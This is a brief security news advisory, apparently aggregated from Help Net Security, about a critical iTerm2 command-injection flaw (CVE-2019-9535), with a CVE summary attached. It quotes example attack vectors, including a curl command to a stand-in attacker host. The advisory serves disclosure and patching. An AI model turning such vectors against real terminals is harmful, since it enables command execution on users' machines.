Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!
2019-10-10 08:47

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system.

“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will …

Source: Help Net Security.


News URL

http://feedproxy.google.com/~r/HelpNetSecurity/~3/_T6q5Y322YI/

Related Vulnerability

Date: 2019-10-09
CVE: CVE-2019-9535
Vulnerability title: Injection vulnerability in iTerm2
Description: A vulnerability exists in the way that iTerm2 integrates with tmux's control mode, which may allow an attacker to execute arbitrary commands by providing malicious output to the terminal.
Attack vector: network
Attack complexity: low
Affected: iterm2
Weakness: CWE-74
Risk: critical (9.8)